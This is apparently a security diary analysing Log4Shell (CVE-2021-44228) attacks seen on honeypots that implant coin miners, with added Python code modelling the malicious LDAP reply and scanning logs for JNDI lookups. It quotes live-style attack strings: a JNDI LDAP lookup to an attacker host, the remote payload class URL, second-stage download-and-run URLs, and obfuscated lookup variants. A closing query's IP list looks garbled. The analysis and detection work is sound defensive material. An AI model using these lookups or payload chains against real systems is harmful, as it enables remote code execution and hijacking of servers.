Log4Shell exploited to implant coin miners
Last Updated: 2021-12-13 01:31:37 UTC
by Renato Marinho (Version: 1)
Analyzing the requests hitting the ISC honeypots, I found that coin-miner operators have just added Log4Shell (CVE-2021-44228) to their arsenal.
The request that hit our honeypot carries the JNDI lookup 'jndi:ldap://45[.]83.193.150:1389/Exploit' (wrapped in log4j's ${...} lookup syntax) in a field that a vulnerable log4j ends up logging. When log4j expands the lookup, the JDK's JNDI LDAP provider queries the attacker's LDAP server, which answers with a naming reference pointing at a remote class; the JVM then fetches and instantiates the malicious payload hosted at 'http://31[.]220.58.29/Exploit.class'. One caveat for anyone triaging this: the remote-codebase stage only succeeds where the runtime still trusts URL codebases (the com.sun.jndi.ldap.object.trustURLCodebase property, false by default since JDK 8u191 and 11.0.1). log4j itself remains vulnerable on newer runtimes, but this particular implant chain fails there.
I found the payload address by performing the same JNDI lookup log4j does and then reading the class name and codebase URL from the returned Reference object. To do so, I wrote a simple tool, which is available on GitHub.
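As an added example (not the diary author's tool, whose source is not reproduced here), the following Python reconstructs the LDAP side of that lookup offline. For 'ldap://45[.]83.193.150:1389/Exploit' the JVM's JNDI provider sends a base-scope search for the DN 'Exploit', and the attacker's server answers with a SearchResultEntry of object class javaNamingReference. The JDK's LDAP provider (com.sun.jndi.ldap.Obj) turns those attributes into a javax.naming.Reference: javaClassName becomes getClassName(), javaFactory names the object-factory class, and javaCodeBase becomes getFactoryClassLocation(). The script encodes such an entry in BER as RFC 4511 specifies, decodes it the way an analysis tool would, and derives the class URL the JVM would fetch, without ever handing the bytes to a JNDI context. The attribute values are constructed; only the resulting URL http://31[.]220.58.29/Exploit.class comes from the diary, so the split into codebase 'http://31[.]220.58.29/' and factory 'Exploit' is an assumption.

```python
"""Offline model of the LDAP reply behind a Log4Shell JNDI lookup (added example,
stdlib only): encode a SearchResultEntry the way a malicious server does, decode it
the way an analyst's tool does, and derive the payload class URL."""


def ber_len(n):
    """BER length: short form below 128, else 0x80|count followed by big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content


def octet(s):
    return tlv(0x04, s.encode())  # OCTET STRING


def search_result_entry(msg_id, dn, attrs):
    """Server side: LDAPMessage { messageID, [APPLICATION 4] SearchResultEntry { dn, attrs } }.
    attrs maps attribute name -> list of string values (PartialAttributeList)."""
    attr_list = b"".join(
        tlv(0x30, octet(name) + tlv(0x31, b"".join(octet(v) for v in vals)))
        for name, vals in attrs.items()
    )
    entry = tlv(0x64, octet(dn) + tlv(0x30, attr_list))  # tag 0x64 = APPLICATION 4, constructed
    mid = tlv(0x02, msg_id.to_bytes((msg_id.bit_length() + 8) // 8, "big"))  # INTEGER
    return tlv(0x30, mid + entry)


def read_tlv(buf, pos=0):
    """Decode one TLV at buf[pos]; return (tag, content, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        count = first & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def children(buf):
    """Yield (tag, content) for each TLV packed inside a constructed value."""
    pos = 0
    while pos < len(buf):
        tag, content, pos = read_tlv(buf, pos)
        yield tag, content


def parse_search_result_entry(msg):
    """Client side: decode the reply into (dn, {attribute: [values]})."""
    tag, body, _ = read_tlv(msg)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage")
    op_tag, op = list(children(body))[1]  # [0] is the messageID
    if op_tag != 0x64:
        raise ValueError(f"expected SearchResultEntry, got tag {op_tag:#x}")
    (_, dn), (_, attr_list) = children(op)
    attrs = {}
    for _, attr in children(attr_list):
        (_, name), (_, vals) = children(attr)
        attrs[name.decode()] = [v.decode() for _, v in children(vals)]
    return dn.decode(), attrs


def reference_from_attrs(attrs):
    """The fields the JDK builds a javax.naming.Reference from. The factory class is the
    one fetched from the codebase and instantiated, so that is the real payload."""
    if "javaNamingReference" not in attrs.get("objectClass", []):
        return None
    return {
        "class_name": attrs["javaClassName"][0],
        "factory": attrs["javaFactory"][0],
        "codebase": attrs["javaCodeBase"][0],
    }


def payload_url(ref):
    """URL a JVM that trusts URL codebases would fetch: codebase + factory class file."""
    return ref["codebase"].rstrip("/") + "/" + ref["factory"].replace(".", "/") + ".class"


# Constructed entry modelled on the honeypot request; values are assumptions except for
# the resulting class URL, which the diary reports. Kept defanged on purpose.
MALICIOUS_ENTRY = search_result_entry(1, "Exploit", {
    "objectClass": ["top", "javaNamingReference"],
    "javaClassName": ["Exploit"],
    "javaFactory": ["Exploit"],
    "javaCodeBase": ["http://31[.]220.58.29/"],
})


def resolve_payload(msg):
    """Full client-side path: bytes from the LDAP server -> payload URL (or None)."""
    _, attrs = parse_search_result_entry(msg)
    ref = reference_from_attrs(attrs)
    return payload_url(ref) if ref else None


if __name__ == "__main__":
    print(resolve_payload(MALICIOUS_ENTRY))
```

Against a live server you would replace MALICIOUS_ENTRY with the bytes read back from the socket after the bind and search exchange; the point of parsing the entry yourself is that nothing here calls InitialContext.lookup(), so the factory class is never loaded, whatever the JDK's trustURLCodebase setting.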
After decompiling the malicious class with Fernflower, I could see the following code.
Depending on the target operating system, the class downloads and executes a second-stage payload from one of two locations.
On Windows, it fetches http://172[.]105.241.146:80/wp-content/themes/twentysixteen/s.cmd, a PowerShell script that downloads and executes a coin miner, as seen below.
On non-Windows operating systems, it downloads and executes an ELF binary hosted at http://18[.]228.7.109/.log/log. I suspect this is also a coin miner, but the ELF file has not been analyzed yet.
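To turn the request above and the diary's indicators into something that can be run over logs, here is an added example in Python (my own code, not from the diary). It de-obfuscates the nested-lookup tricks seen in the wild (${lower:j}, ${::-j}, ${env:X:-j}), pulls the scheme, host and port out of every ${jndi:...} lookup, flags lookup hosts that match the four IPs published above, and also flags plain mentions of those IPs, which is what a proxy or firewall log would show for the second-stage downloads. The log lines are constructed for the example, with RFC 5737 documentation addresses as placeholders for client IPs; the indicators are the diary's, refanged only for matching.

```python
import re

# Constructed sample log lines (not from the diary): an Apache access log entry carrying
# the honeypot request's lookup in the User-Agent, the same kind of lookup obfuscated
# with nested lookups, a probe landing in an sshd "Invalid user" line, a benign request,
# and a proxy log line recording the Windows second-stage download.
SAMPLE_LOGS = [
    '203.0.113.7 - - [12/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://45.83.193.150:1389/Exploit}"',
    '203.0.113.8 - - [12/Dec/2021:03:14:20 +0000] "GET /login HTTP/1.1" 404 12 "-" '
    '"${${lower:j}ndi:${::-l}dap://198.51.100.23:1389/a}"',
    "Dec 12 03:15:02 host sshd[2231]: Invalid user ${jndi:ldap://198.51.100.23:1389/a} "
    "from 203.0.113.9 port 40112",
    '203.0.113.10 - - [12/Dec/2021:03:16:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    "2021-12-12T03:16:40Z proxy 10.1.2.3 GET http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd 200",
]

# Indicators from the diary, kept defanged as published and refanged for matching.
DEFANGED_IOCS = ["45[.]83.193.150", "31[.]220.58.29", "172[.]105.241.146", "18[.]228.7.109"]


def refang(indicator):
    return indicator.replace("[.]", ".")


IOC_HOSTS = sorted(refang(i) for i in DEFANGED_IOCS)

# Innermost ${...}: a lookup with no further lookup nested inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body):
    """Evaluate one log4j lookup the way attackers rely on for obfuscation, or return
    None to leave it alone (the jndi: lookup itself, or anything unrecognised)."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:  # default-value syntax: ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    return None


def normalize(text):
    """Collapse nested lookups from the inside out until only the jndi: lookup
    (or unrelated ${...} text) remains."""
    for _ in range(32):  # bounded; nesting depth in real probes is small
        changed = False

        def sub(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER.sub(sub, text)
        if not changed:
            break
    return text


# Scheme, host and optional port of a ${jndi:<scheme>://host[:port]/...} lookup.
LOOKUP = re.compile(r"\$\{jndi:(\w+):/*([^/}:]+)(?::(\d+))?", re.IGNORECASE)


def extract_lookups(line):
    """Return [(scheme, host, port)] for every JNDI lookup in a line, after de-obfuscation."""
    return [(m.group(1).lower(), m.group(2), int(m.group(3)) if m.group(3) else None)
            for m in LOOKUP.finditer(normalize(line))]


def _mentions(host, line):
    # Whole-address match, so 18.228.7.109 does not fire on 118.228.7.109.
    return re.search(r"(?<![\d.])" + re.escape(host) + r"(?!\.?\d)", line) is not None


def scan(lines):
    """Run both checks over an iterable of log lines and return findings in line order."""
    findings = []
    for number, line in enumerate(lines, 1):
        seen = set()
        for scheme, host, port in extract_lookups(line):
            findings.append({"line": number, "kind": "jndi_lookup", "scheme": scheme,
                             "host": host, "port": port, "known_ioc": host in IOC_HOSTS})
            seen.add(host)
        for host in IOC_HOSTS:
            if host not in seen and _mentions(host, line):
                findings.append({"line": number, "kind": "ioc_host", "host": host})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

The de-obfuscation step matters more than the IOC list: the published IPs will rotate within days, but any lookup that still resolves to `${jndi:` after normalization is worth an alert regardless of where it points. The host pattern does not handle bracketed IPv6 literals, so extend LOOKUP if your logs may contain them.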
Bojan and Johannes wrote about Log4Shell here and here, respectively.
Files (MD5 and SHA256 hashes)
Morphus Labs | LinkedIn | Twitter
((dstPort:80 OR dstPort:443 OR dstPort:389 OR dstPort:1389) AND (dstIP:18.104.22.168 OR dstIP:22.214.171.124 OR dstIP:126.96.36.199 OR dstIP:188.8.131.52 OR dstIP:184.108.40.206 dstIP:220.127.116.11 OR dstIP:18.104.22.168 OR dstIP:22.214.171.124 OR dstIP:126.96.36.199 OR dstIP:188.8.131.52 OR dstIP:184.108.40.206 OR dstIP:220.127.116.11)) OR (query:*ryedge.io OR query:*.kryptoslogic-cve-2021-44228.com)
So far, no exploits here or on my friend's network, where I've deployed a log server like the one I built for home, but lots and lots of probes.
I've even seen some JNDI stuff in failed logins in SSH logs... (I suppose in the hopes that someone like myself logs all that using vulnerable software.)
Dec 13th 2021